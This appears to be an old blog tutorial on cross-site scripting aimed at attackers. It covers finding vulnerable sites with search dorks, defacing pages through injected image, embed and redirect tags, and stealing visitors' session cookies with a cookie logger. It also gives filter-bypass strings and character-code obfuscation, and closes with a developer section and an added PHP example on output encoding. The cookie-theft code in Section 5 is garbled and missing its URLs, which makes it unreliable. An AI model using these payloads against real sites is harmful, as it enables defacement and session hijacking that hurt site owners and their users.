XSS Tutorial

Section 1 - Understanding XSS
"CSS", also known as "XSS" (Cross Site Scripting, not to be confused with Cascading Style Sheets), is a vulnerability often encountered in web applications. It gives an attacker the opportunity to add malicious code. Many types of XSS attack are possible. Here I will cover the three most widely used.
The first kind of attack I want to talk about is XSS through the URL. This means the XSS does not remain on the page. In this case we simply enter the code and press "submit". How we use this to our own benefit will be discussed later.

The second attack is through an input field, which is often where you add data. As an example, say we find a site with a search engine. We type "hacker" into the search box and start the search. When the page loads, it shows something like "found 100 results for hacker", so the data we entered is displayed on the page. Now what if we enter code instead? With this attack it is not possible to run PHP code, but it is possible to run HTML and JavaScript code. Note that this method does not stay on the server either.

With the third attack method, code can be added and it stays on the site permanently. There are two related types, PHP and HTML. This kind of attack is usually found in blogs, profiles and forums, and in most places where you can add data that stays on the page. HTML is very different from PHP. HTML is downloaded to your computer and parsed in your browser (which is why you can view the page source). With PHP, the script hosted on the server is parsed there, and then the data is sent back to the browser. For this reason PHP injection is extremely rare. Note: PHP code can never be injected into the HTML page.

Section 2 - Finding XSS Vulnerabilities

To find these vulnerabilities you can start by trying blogs, forums, shout boxes, comment boxes and search boxes. There are more examples than the ones mentioned here.
Google dorks can be used to find them more easily. As an example, you can type inurl:"search.php?q=". This is a very common page and many results can be obtained. Also note that most sites have an XSS vulnerability; a good eye and some knowledge of how to bypass filters are enough to find it.

Section 3 - Basic Concepts of XSS

Let's get started by learning the most commonly used XSS.
The most common one is <script>alert("xss")</script>.

This code pops up an alert saying "xss", without the quotation marks, and it is easy to edit.
So, remembering the search.php?q= page mentioned in the previous section, we can simply try it on a web site:
search.php?q=<script>alert("xss")</script>

It will probably work. If it does not, no problem: look at different sites or experiment with variations. (Many people do not realize that plain HTML can be added, not just JavaScript.)

search.php?q=<br><b><u>xss</u></b>

If the text is shown in bold on the page, you know it is vulnerable, and you can use the methods I will explain later.

Section 4 - Attack Methods

Now that we have learned how XSS works, we can go over some XSS deface methods. There are many methods that can be used to deface; I will cover the most effective and most common of them.

The first one is IMG SRC. For those who do not know HTML, IMG SRC is the tag used to display a picture from a link on a web site.

<html> <body> <IMG src= "">

If you change the link to a working picture link, save it and run it, you will better understand what I mean.
Now let's say you have found a shout box, a comment box or any other place that shows your data after you enter and submit it. To show a picture on the page you can add the link as given below.
<IMG Src= "">

You do not need the other tags, because the page already contains them.
This makes your image appear large, and the site clearly looks hacked.
Another method is to use a flash video. It is the same as the method above, done in a slightly different way.

<EMBED Src= "">
Here the link is to the flash video itself, which will be played.
A popup or a redirect may also be used:
<script> ( "" )</script>

Section 5 - Cookies

First a cookie logger is placed on a site: we obtain the file and upload it as a .php file. Do not forget to create a log.txt file and chmod it to 777. Next we need a site where an XSS vulnerability has been found, on which the attack can be performed. Now add this code:

window.location = "cookie ="+<script>.
<srcipt>. location = "cookie ="+</script>.

Then, when a user visits the site, their cookie goes to the cookie logger. The required information is sent to our site and the cookies are stolen. The second one is more covert. Add it to your file, and the user's session cookies are then forwarded. But what if the site we are attacking only shows the data once and does not store it? Let us say we have a search.php?q= page in our hands. We can use the code below to make a malicious URL from it, and perhaps hex or base64 encode it.

=<script>. location = " ="+</script> . cookie

Section 6 - Bypassing Filtering

On many sites that seem vulnerable the code does not run. This section is about solving that. Some common methods used to bypass filtering:

') alert (' xss');
"); alert ( 'xss');

On a vulnerable server these do the same thing as <script>alert("xss")</script>. You can also try hex or base64 encoding the data before submitting it. Be aware of one thing: testing with alert("xss") is not a good practice, because I know of sites that block the string "xss".
Other ways to bypass filtering:

<script Type = text / javascript>alert("PlanetCreator")</script>
<script>alert( "PlanetCreator")</script>;
<script>alert( PlanetCreator");</script>
<script>alert( PlanetCreator"/)<script>
<script>var var = 1; alert(var)</script>

Section 7 - Advanced XSS

This section covers methods that I use myself and have not found anywhere else; I'm sure you will like them. I have seen many sites that have "magic quotes" turned on, which makes some commands useless. However, I came up with a technique for these sites that uses decimal ASCII values.

To convert characters to decimal numbers you need an ASCII table containing all of the values.
One can be found at the site "Ascii Table - ASCII character codes and html, octal, hex and decimal chart conversion". This table will help you write out whatever you want to print.

80 108 97 110 101 116 67 114 101 97 116 111 114

Now that we have the string's decimal values, we need to know which JavaScript function converts them back into a string.

This function is suitable for this kind of thing and it is easy to use. We pass our own values as its arguments:

String.fromCharCode(80, 108, 97, 110, 101, 116, 67, 114, 101, 97, 116, 111, 114)

So now
"String.fromCharCode(80, 108, 97, 110, 101, 116, 67, 114, 101, 97, 116, 111, 114)"
is the JavaScript (ASCII) way of writing "PlanetCreator".

To use it with alert you do not need quotes or anything else, because it already acts as a variable itself.

alert(String.fromCharCode(80, 108, 97, 110, 101, 116, 67, 114, 101, 97, 116, 111, 114))

In this case the popup will show "PlanetCreator". This method is a way to bypass magic quotes.
Before continuing to the next section, I would like to talk about another method, this time using variables.
Let's declare one:

var myVar = 1
myVar is now another way of saying 1.

To use variables to our own advantage in XSS, we can write the following:

<script>var myVar = 1; alert(myVar)</script>
Here the contents of the variable are displayed without using any quotes.

Section 8 - XSS Security

This section is intended for web developers. I will talk about how to write your code so that it is secure.
If you have found XSS vulnerabilities in your scripts, securing them is very simple. Take a look at the following code:

// Vulnerable: the submitted value is echoed into the page unchanged
if (isset($_POST['form'])) {
    echo "<html><body>" . $_POST['form'] . "</body></html>";
}

Let's say the $_POST['form'] variable comes from an input box. The page is then exposed to an XSS attack. Securing it is very simple:

$charset = 'UTF-8';
if (isset($_POST['form'])) {
    // Encode the value before it is written into the page
    $data = htmlentities($_POST['form'], ENT_NOQUOTES, $charset);
    echo "<html><body>" . $data . "</body></html>";
}

This line of code converts all applicable characters to HTML entities.
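
The fix above, and the reason quote escaping from Section 7 is no substitute for it, shown as an added example that is not code from the original post. The helper names encode_body and encode_attr and both sample inputs are assumptions made for the illustration; it also shows that ENT_NOQUOTES is only suitable for text between tags, not for attribute values.

```php
<?php
declare(strict_types=1);

// Added example: these helper names do not come from the tutorial.

/** Encode untrusted text for an HTML element body (the Section 8 fix). */
function encode_body(string $s): string
{
    return htmlspecialchars($s, ENT_NOQUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Encode untrusted text for a quoted HTML attribute value. */
function encode_attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs. The first is the quote-free test string from Section 7.
$quoteFree = '<script>alert(String.fromCharCode(80,108,97,110,101,116,67,'
           . '114,101,97,116,111,114))</script>';
$withQuote = 'PlanetCreator" data-x="1';

$checks = [
    // Quote escaping finds nothing to escape, so the markup passes through.
    'addslashes leaves quote-free markup unchanged'
        => addslashes($quoteFree) === $quoteFree,
    // Entity encoding turns < and > into text, so no element is created.
    'encode_body removes every < and >'
        => strpbrk(encode_body($quoteFree), '<>') === false,
    // ENT_NOQUOTES keeps the double quote: wrong choice inside value="...".
    'encode_body keeps a raw double quote'
        => strpos(encode_body($withQuote), '"') !== false,
    // ENT_QUOTES encodes it, so the value cannot end the attribute early.
    'encode_attr removes every raw quote'
        => strpbrk(encode_attr($withQuote), "\"'") === false,
];

foreach ($checks as $label => $ok) {
    echo ($ok ? 'PASS ' : 'FAIL ') . $label . PHP_EOL;
}

// Usage in a template: pick the encoder that matches the output context.
// A non-string value (for example form[]=x) is treated as empty.
$q = is_string($_POST['form'] ?? null) ? $_POST['form'] : '';
echo '<p>Results for ' . encode_body($q) . '</p>' . PHP_EOL;
echo '<input name="form" value="' . encode_attr($q) . '">' . PHP_EOL;
```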

12 comments:

EgaBlogSpot January 13, 2010 at 4:28 PM

Yes when I know the language :-)
